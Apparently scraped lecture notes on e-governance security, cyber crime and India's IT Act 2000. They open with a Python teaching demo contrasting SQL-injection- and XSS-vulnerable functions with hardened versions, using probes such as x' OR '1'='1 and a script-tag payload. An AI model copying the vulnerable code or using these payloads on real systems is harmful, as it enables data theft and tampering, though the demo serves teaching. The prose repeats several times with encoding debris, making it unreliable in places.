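SAMPLE_CITIZENS = [
    (1, "Asha Verma", "asha@example.invalid"),
    (2, "Ravi Kumar", "ravi@example.invalid"),
    (3, "Meera Nair", "meera@example.invalid"),
]


def build_db() -> sqlite3.Connection:
    """In-memory database holding the sample citizen table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO citizens VALUES (?, ?, ?)", SAMPLE_CITIZENS)
    return conn


# --- SQL injection: disclosure (SELECT) and integrity loss (UPDATE) ---------

def lookup_vulnerable(conn, name):
    """Vulnerable: user input is pasted into the SQL text, so it can change the
    query's structure, for example by turning the filter into a tautology."""
    return conn.execute(
        f"SELECT id, name FROM citizens WHERE name = '{name}'").fetchall()


def lookup_safe(conn, name):
    """Hardened: a bound parameter; the driver treats the value as data only."""
    return conn.execute(
        "SELECT id, name FROM citizens WHERE name = ?", (name,)).fetchall()


def update_email_vulnerable(conn, citizen_id, email):
    """Vulnerable: an injected WHERE clause can rewrite every citizen's record,
    which is the data-integrity compromise the text refers to."""
    cur = conn.execute(
        f"UPDATE citizens SET email = '{email}' WHERE id = {citizen_id}")
    return cur.rowcount  # number of rows actually modified


def update_email_safe(conn, citizen_id, email):
    """Hardened: validate the identifier's shape, then bind both values."""
    if not citizen_id.isdigit():
        return 0  # reject malformed ids instead of guessing what was meant
    cur = conn.execute(
        "UPDATE citizens SET email = ? WHERE id = ?", (email, int(citizen_id)))
    return cur.rowcount


# --- Cross-site scripting: output encoding ---------------------------------

def render_vulnerable(name):
    """Vulnerable: raw user input is written into the HTML response."""
    return f"<p>Results for {name}</p>"


def render_safe(name):
    """Hardened: html.escape() converts markup characters to entities, so the
    input is displayed as text rather than interpreted by the browser."""
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def demo():
    """Run constructed inputs through both versions; returns observable results."""
    conn = build_db()
    # Constructed malicious inputs: the first two close the intended filter and
    # add an always-true condition; the third is the classic script-tag probe.
    sqli_name = "x' OR '1'='1"
    sqli_id = "1 OR 1=1"
    xss_name = "<script>alert(1)</script>"
    return {
        "leaked_rows": len(lookup_vulnerable(conn, sqli_name)),  # 3: whole table
        "safe_rows": len(lookup_safe(conn, sqli_name)),          # 0: no such name
        "overwritten_rows": update_email_vulnerable(conn, sqli_id, "x@example.invalid"),  # 3
        "safe_updates": update_email_safe(conn, sqli_id, "x@example.invalid"),            # 0
        "html_vulnerable": render_vulnerable(xss_name),
        "html_safe": render_safe(xss_name),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```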

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms, Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in IT ACT 2000.

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services.

Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users

65 Million Active Internet Users, up by 28% from 51 million in 2010

50 Million users shop online on Ecommerce and Online Shopping Sites

46+ Million Social Network Users

346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource or diminishes its value or utility or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever without permission of the owner of the computer:

Secures Access

Downloads, Copies or extracts any data, computer database or any information

Introduces or causes to be introduced any Virus or Contaminant

Disrupts or causes disruption

Denies or causes denial of access to any person

Provides any assistance to any person to facilitate access

Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network

Shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, Deletes or Alters any Information residing in a computer resource or diminishes its value or utility or affects it injuriously by any means

Steals, conceals, destroys or alters or causes any person to steal, conceal, destroy or alter any computer source code used for a computer resource with an intention to cause damage

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both" [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

Any information that is grossly offensive or has menacing character; or

Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device;

Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages;

Shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce.

Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1 Legal recognition of electronic documents

2 Legal recognition of digital signatures

3 Offences and contraventions

4 Justice dispensation systems for cybercrimes

Offences – (Section, Offence, Punishment)

Section 65 - Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years or/and with fine up to 2 lakh rupees.

Section 66 - Hacking. Punishment: imprisonment up to three years or/and with fine up to 5 lakh rupees.

Section 66-A - Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms-

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of Cyber Security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient so to do in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.

Page 52: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 51

51

Implement

Environmental

Design

Permitting

Construction

Commissioning and Administration

Operate

Startup

Monitoring

Assessment

Enhancement

Contract Modifications

Contract Renegotiations

READINESS IN E-GOVERNANCE

A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations

The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches

Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past

PREPARED BY ARUN PRATAP SINGH 52

52

five years as countries have made significant investments in their telecommunications infrastructure

SECURITY ISSUES IN E-GOVERNANCE

1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government

The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service

2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens

The process approach for information security management system ISMS encourages its users to emphasize the importance of

understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security

implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks

monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement

Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event

Example of organizational and technical measures to prevent unauthorized access and processing are shown

Protecting premises equipment and systems software including input-output units

PREPARED BY ARUN PRATAP SINGH 53

53

Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including

transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of

personal data Enabling subsequent determination of when individual personal data were entered into a

filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals

3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information

Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies

PREPARED BY ARUN PRATAP SINGH 54

54

CYBER CRIME AND LAWS

The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment

or any offence against morality social order or any unjust or shameful act The ldquoOffence

is defined in the Code of Criminal Procedure to mean as an act or omission made

punishable by any law for the time being in force

Cyber Crime is emerging as a serious threat World wide governments police

departments and intelligence units have started to react

Cyber Crime is a term used to broadly describe criminal activity in which computers or

computer networks are a tool a target or a place of criminal activity and include everything

from electronic cracking to denial of service attacks It is also used to include traditional

crimes in which computers or networks are used to enable the illicit activity

Computer crime mainly consists of unauthorized access to computer systems data

alteration data destruction theft of intellectual property Cyber crime in the context of

national security may involve hacking traditional espionage or information warfare and

related activities

Pornography Threatening Email Assuming someones Identity Sexual Harassment

Defamation Spam and Phishing are some examples where computers are used to commit

crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking

are examples where computers become target of crime

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking was reported to have seen a 37 per cent increase in the year these notes were written.

Cyber Squatting

Cyber squatting is the act of registering a famous domain name and then selling it for a fortune. This is an issue that has not been tackled in the IT Act 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of financial institutions requesting them to enter their username, password or other personal information (typically on a look-alike website controlled by the fraudster) in order to access their account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base (figures for India, compared with 2010):

- 121 million Internet users
- 65 million active Internet users, up by 28% from 51 million in 2010
- 50 million users shop online on e-commerce and online shopping sites
- 46+ million social network users
- 346 million mobile users had subscribed to data packages

CYBER LAW

Section 66 of the IT Act 2000, as originally enacted, defined hacking as follows:

(1) Whoever, with the intent to cause or knowing that he is likely to cause wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Section 43 (penalty for damage to computer, computer system, etc.)

Whoever, without permission of the owner of the computer,

- secures access;
- downloads, copies or extracts any data, computer database or any information;
- introduces or causes to be introduced any virus or contaminant;
- disrupts or causes disruption;
- denies or causes denial of access to any person;
- provides any assistance to any person to facilitate access;
- charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network;
- destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means;
- steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage;

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

S 66 - Computer related offences

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years or with fine which may extend to five lakh rupees or with both." [S66]

S 66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device,

(a) any information that is grossly offensive or has menacing character; or
(b) any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently by making use of such computer resource or a communication device; or
(c) any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67A - Punishment for publishing or transmitting of material containing sexually explicit act, etc. in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67C - Preservation and retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This Act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It received Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules formed part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section 65 – Tampering with computer source documents: intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force. Punishment: imprisonment up to three years, or/and fine up to 2 lakh rupees.

Section 66 – Hacking. Punishment: imprisonment up to three years, or/and fine up to 5 lakh rupees.

Section 66-A – Sending offensive messages through electronic means: sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages. Punishment: imprisonment up to three years and with fine.

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government or a State Government, or its authorized agency, to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for the investigation of any offence. They can also secure assistance from computer personnel in decrypting data (a form of mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime. Section 66A was subsequently struck down as unconstitutional by the Supreme Court of India in Shreya Singhal v. Union of India (2015), on the ground that its vaguely worded terms such as "grossly offensive" and "menacing character" violated the right to freedom of speech under Article 19(1)(a) of the Constitution.


Page 54: Web technology and commerce unit 4

PREPARED BY ARUN PRATAP SINGH 53

53

Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including

transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of

personal data Enabling subsequent determination of when individual personal data were entered into a

filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals

3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis

Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness

Continually improve its control environment Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information

Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies


CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order, or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms, Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking had witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.


Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users
65 Million Active Internet Users, up by 28% from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages


CYBER LAW

(1) Whoever, with the Intent to cause or knowing that he is likely to cause Wrongful Loss or Damage to the public or any person, Destroys or Deletes or Alters any Information Residing in a Computer Resource, or diminishes its value or utility, or affects it injuriously by any means, commits hacking.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures Access
Downloads, Copies or extracts any data, computer database or any information
Introduces or causes to be introduced any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of another person by Tampering with or Manipulating any Computer, Computer System or Computer Network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section - 43

Destroys, Deletes or Alters any Information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person dishonestly or fraudulently does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both." [S66]

S66A - Punishment for sending offensive messages through communication service, etc.

Any person who sends, by means of a computer resource or a communication device:

Any information that is grossly offensive or has menacing character; or

Any information which he knows to be false, but for the purpose of causing annoyance, inconvenience, danger, obstruction, insult, injury, criminal intimidation, enmity, hatred or ill will, persistently makes by making use of such computer resource or a communication device; or

Any electronic mail or electronic mail message for the purpose of causing annoyance or inconvenience, or to deceive or to mislead the addressee or recipient about the origin of such messages,

shall be punishable with imprisonment for a term which may extend to three years and with fine.

S 66C - Punishment for identity theft

"Whoever, fraudulently or dishonestly, makes use of the electronic signature, password or any other unique identification feature of any other person, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to rupees one lakh."

S 66D - Punishment for cheating by personation by using computer resource

"Whoever, by means of any communication device or computer resource, cheats by personation, shall be punished with imprisonment of either description for a term which may extend to three years and shall also be liable to fine which may extend to one lakh rupees."

S 66E - Punishment for violation of privacy

"Whoever, intentionally or knowingly, captures, publishes or transmits the image of a private area of any person without his or her consent, under circumstances violating the privacy of that person, shall be punished with imprisonment which may extend to three years or with fine not exceeding two lakh rupees, or with both."

S 67 A - Punishment for publishing or transmitting of material containing sexually explicit act, etc., in electronic form

"Whoever publishes or transmits or causes to be published or transmitted in the electronic form any material which contains sexually explicit act or conduct shall be punished on first conviction with imprisonment of either description for a term which may extend to five years and with fine which may extend to ten lakh rupees."

S 67 C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified, for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

